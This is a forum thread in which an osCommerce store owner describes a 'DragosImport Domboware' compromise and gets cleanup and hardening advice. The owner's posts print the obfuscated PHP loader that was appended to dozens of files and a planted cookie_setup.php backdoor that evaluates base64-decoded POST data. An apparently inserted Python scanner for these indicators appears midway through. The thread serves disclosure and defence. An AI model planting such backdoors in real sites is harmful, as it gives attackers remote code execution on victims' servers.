
Atrosh

Critical: New dangerous exploit: DragosImport Domboware attacks


Hello everyone,

 

My oscommerce site just got shut down, since I apparently had malware scripts uploaded on my site. I had gotten "fleeting" warnings once or twice that I had malware on my site through my antivirus program, but I disregarded it in the end since I couldn't recreate the warnings, all "online scanners" reported my site as malware free, and even google webmaster tools reported it as malware free. I now believe the reason for this is that I was the subject of a brand new attack. (On a side note, I must complain about how much bad luck I have; the site went "live" 3rd December, the attacks happened 4th Dec 23:12, and the malware wasn't reported on the Internet until the 5th of December, in other words my brand new site was the subject of a brand new attack! Neat, huh?)

 

This attack is supposedly targeting a "new" weakness found in osCommerce, for more info about the exploit, please read the following link: http://www.stoptheha...boware-attacks/

 

The attack

 

This code:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "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";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

 

has been added to the end of the following files:


includes/languages/swedish/modules/header_tags/ht_product_title.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_opensearch.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_manufacturer_title.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_mailchimp_360.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_google_analytics.php // <-- Header Tags SEO Module
includes/languages/swedish/modules/header_tags/ht_category_title.php // <-- Header Tags SEO Module
includes/languages/swedish/index.php
includes/languages/german/index.php
includes/languages/espanol/index.php
includes/languages/english/index.php
includes/header_tags.php // <-- Header Tags SEO Module
includes/header.php
includes/functions/header_tags.php // <-- Header Tags SEO Module
includes/footer.php
includes/boxes/headertags_seo_silo_W_Products.php // <-- Header Tags SEO Module
includes/boxes/headertags_seo_silo.php // <-- Header Tags SEO Module
includes/boxes/header_tags.php // <-- Header Tags SEO Module
"admin"/includes/languages/german/index.php
"admin"/includes/languages/russian/index.php
"admin"/includes/languages/espanol/index.php
"admin"/attributeManager/includes/attributeManagerHeader.inc.php
"admin"/includes/boxes/header_tags_seo.php // <-- Header Tags SEO Module
"admin"/header_tags_test.php // <-- Header Tags SEO Module
"admin"/header_tags_seo_silo.php // <-- Header Tags SEO Module
"admin"/header_tags_seo_popup_logotext.php // <-- Header Tags SEO Module
"admin"/header_tags_seo_popup_help.php // <-- Header Tags SEO Module
"admin"/header_tags_seo.php // <-- Header Tags SEO Module
"admin"/header_tags_fill_tags.php // <-- Header Tags SEO Module
"admin"/includes/footer.php
"admin"/includes/functions/header_tags.php // <-- Header Tags SEO Module
"admin"/includes/functions/header_tags_general.php // <-- Header Tags SEO Module
"admin"/includes/header.php
"admin"/includes/languages/english/index.php
"admin"/index.php
"admin"/includes/languages/swedish/header_tags_seo.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/header_tags_seo_popup_help.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/header_tags_seo_popup_logotext.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/header_tags_seo_silo.php // <-- Header Tags SEO Module
"admin"/includes/languages/swedish/index.php
"admin"/includes/languages/swedish/modules/cfg_modules/cfgm_header_tags.php // <-- Header Tags SEO Module
includes/modules/header_tags_social_bookmarks.php // <-- Header Tags SEO Module
index.php

 

Note that 26/42 of the files infected belonged to the Header Tags SEO Module - however this does NOT necessarily mean that the weakness lies in the module itself; although this MAY be the case, there could be a number of other reasons why the Header Tags SEO files were infected; at this point, I have no information regarding what the weakness/exploit is.

 

I've tried looking around to see what the exploit/weakness in this particular case is, but since this exploit is so new there is no information on how to prevent these attacks. Obviously deleting all the infected code would be a temporary solution, but unless the source of the problem is found, it may just happen again.

 

Guys, this is where you come into play. Please help me find the reason I've been attacked! As stated in the link earlier (regarding the attack), this exploit has apparently affected a lot of osCommerce stores, so I'm sure my case is not unique. I'll provide any and all information you may need.

 

NOTE ON SECURITY MEASURES USED ON THE SITE: Now this is a bit embarrassing, but at the time of the attack (4th Dec 23:12 GMT), I had no additional security measures installed on the site. All the security measures were added 6-8th December. Please do note however that the site went "live" the 3rd of December, I submitted my google sitemap the 4th and got hacked the SAME DAY. I couldn't have expected that, but now I know not to procrastinate adding security measures for even 1 hour after launching the site.

 

Best regards,

Atra

 

Edit: I am running v2.2 RC1


You should really not start a new site using an old software version, 2.2 RC1 has many "security" holes. (At the very least you should have done all the required security updates and added the required security mods before making the site live)

 

For new sites you should definitely use the latest stable version which at the time of writing this is V2.31


Yeah, problem was when I started making the site I didn't realize the version was that old, and so I've just kept building on it... I'm guessing changing the version would take at least a couple of days of full-time work, considering all the files I've changed?

 

However, I have added security measures (unfortunately after I got infected but prior to knowing it), using the sticky post in this forum. Is there another list with required security updates I should know about? I think that would be faster than reinstalling the whole site.

 

Edit: I think I found a list of recommended security updates, if this was what you were referencing: http://forums.oscommerce.com/topic/375288-updated-security-thread/page__p__1584648


What I've done so far:

 

- Removed all the bad code from the infected files

- Manually browsed through all occurrences of ".js" in the files on my site: nothing suspicious found

 

I'll keep you updated... If anyone has a suggestion on what to look for or how the site might have gotten infected in the first place, please help me out.


Make sure your site is totally clean, rename your admin folder and make sure it's secured properly with a htaccess login.

 

Delete these 2 files in admin: file_manager.php and define_language.php

 

And follow the recommendations in: Updated Security Thread


Thank you for your help.

 

I had already done those things, unfortunately _after_ getting hacked but prior to knowing it. I am currently implementing the changes listed in the Updated Security Thread you linked to - thanks again.

 

I will post here if I find anything else specific to the exploit.


According to Harald (http://forums.oscommerce.com/topic/382081-exploit-dragosimport-domboware-attacks/) the weakness used by this malware is

The exploit does not work on:

 

*) a secured v2.2 installation (htpasswd protected admin)

*) v2.3.0/v2.3.1

*) v3.0.x

 

It's advisable to htpasswd protect all admin apps on your site, regardless of what software is installed.

 

Kind regards,


You may want to consider installing SiteMonitor. It would have listed all of the changes, saving you a lot of time in fixing the problem, and will find them, even now, if you run its hacker test. When a hacker makes changes like this, he will almost always upload his files too so just cleaning the files may not do you much good.



Ok so I ran the hacker test.... A total of 86 warnings, but most of them were false positives from what I can gather.

I've tried to filter out the ones I find suspicious, posting them here.. Running 2.2 RC1.

 

cookie_setup.php line 13:


<?php
/*
 $Id: cookie_setup.php 1739 2007-12-20 00:52:16Z hpdl $
 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com
 Copyright (c) 2003 osCommerce
 Released under the GNU General Public License
*/
if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a2226ed57a"])) @eval(base64_decode($_POST["a2226ed57a"])); exit; }
?>


 

headsent.php, line 2:

0003  error_reporting(0);

 

In the headsent.php file, it basically opens with setting error_reporting(0); and then proceeds to the rest of the file... is this normal?

 

And I'm especially suspicious about the cookie_setup.php thing, looks very.. malwareish?

 

Edit: Oh. cookie_setup.php isn't even supposed to exist. I suppose this is what the hacker must have uploaded to regain access whenever he wanted to? Like a cookie that always enables him to stay logged on the admin section or something? I deleted the file and have already changed the name of my admin folder (again), added htpasswd protection and changed all passwords (ftp, db etc)... Can I feel safe now?



Good catch. The addition of the cookie_setup file is a common hacking technique. It is usually accompanied by a change to the english/cookie_usage.php file (or whatever your languages are). Also, most legitimate oscommerce code doesn't start with turning error reporting off. That is almost always a sign it is a hacker file.

 

Can you feel safe? I would say safer. Hackers are always trying to find new ways in and may find a new method tomorrow.



Thank you very much for your help.

A quick note on "headsent.php" - I now remember downloading this file when trying to fix the "headers already sent" error I had a while back, and the error_reporting(0) is supposed to be in there.

 

Just have a quick question on SiteMonitor; I get the warning that I have non-image files in my image folder - however I've double and triple-checked the folder, I even downloaded its entire contents to my PC then wrote a python script to show me all files that weren't jpg, png, gif, tif, or bmp, and the only file which met that criteria was the .htaccess file. Could it be that .tif or .bmp don't count as images in the addon, or am I missing something?

 

Of course :) I've learned to always stay updated on the latest security threats regarding osCommerce now, and hopefully won't have this happen to me again (not really looking forward to another 12 hour anti-crack marathon).

 

Thanks again for the help,

Best regards,


The code only looks for .php and .txt files. It should display the files it finds. If it is not displaying them, you may have the wrong file. The last version was uploaded with a file that should have been updated. I haven't had time to update the package but the correct file is posted in the support thread.
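As an added example (not SiteMonitor's code, nor anything posted in this thread), a small Python scan that looks for the indicators the replies above describe: an eval(base64_decode()) backdoor like the one in cookie_setup.php, a file that opens with error_reporting(0), the \xNN/\NNN escaped-string obfuscation style of the appended code, and .php/.txt files sitting in the images folder. The sample file contents, paths and indicator names are constructed for the demo; every hit is a lead for manual inspection, not proof of compromise (headsent.php shows the false-positive case).

```python
import os
import re
import tempfile
from pathlib import Path

# Constructed heuristics for the indicators discussed in this thread (not SiteMonitor's code):
# eval(base64_decode()) backdoors, a file opening with error_reporting(0), and long runs of
# \xNN / \NNN string escapes like the appended code. Each match is a lead to inspect by hand.
INDICATORS = [
    ("eval_base64", re.compile(r"@?eval\s*\(\s*base64_decode\s*\(", re.I)),
    ("opens_with_error_reporting_0", re.compile(r"\A\s*<\?php\s*@?error_reporting\s*\(\s*0\s*\)\s*;", re.I)),
    ("escaped_string_obfuscation", re.compile(r"(?:\\x[0-9a-f]{2}|\\[0-7]{3}){6,}", re.I)),
]

def scan_php(text):
    """Return the indicator names whose pattern matches one PHP file's contents."""
    return [name for name, pat in INDICATORS if pat.search(text)]

def scan_tree(root):
    """Walk a site tree; return {relative path: [indicators]} for files that deserve a manual look."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hits = []
            if rel.startswith("images/") and name.lower().endswith((".php", ".txt")):
                hits.append("script_in_images_dir")  # a script has no business in images/
            if name.lower().endswith(".php"):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits += scan_php(fh.read())
            if hits:
                findings[rel] = hits
    return findings

def demo():
    """Write a constructed mini site (clean files plus the suspicious kinds above) and scan it."""
    root = tempfile.mkdtemp()
    samples = {
        "cookie_setup.php": "<?php\n/* header comment */\nif (isset($_GET['cookie'])) { "
            "if (isset($_POST['k'])) @eval(base64_decode($_POST['k'])); exit; }\n?>",
        "headsent.php": "<?php\nerror_reporting(0);\nob_start();\n?>",  # flagged, but may be legitimate
        "includes/header.php": "<?php\n// legitimate template code\n?>\n"
            r'<?php @error_reporting(0); $e = "\x65\144\x6f\154\x70\170\x65"; ?>',
        "images/logo.gif": "GIF89a", "images/.htaccess": "Options -Indexes", "images/shell.txt": "<?php ?>",
    }
    for rel, body in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
    return scan_tree(root)
```

Run `scan_tree()` against a copy of the webroot and compare the list with a known-clean copy of the same files; the .htaccess in images/ is correctly left alone.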


Can I feel safe now?

 

If you have followed the security recommendations, change the admin directory name, etc, and cleaned out your files and had a look through the configuration settings to make sure no extra code has been added in there, then your site will be safe to use. The osC_Sec addon has the actual security patch in it for the specific security hole that was exploited by these attackers. So if you have followed the install instructions then the site will actually be 'patched' against that attack.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX



Yeah I cleaned out all files, followed all of the security recommendations, changed the admin name again (and all passwords), and installed osc_sec (I also went through all links in your signature etc) - thanks!
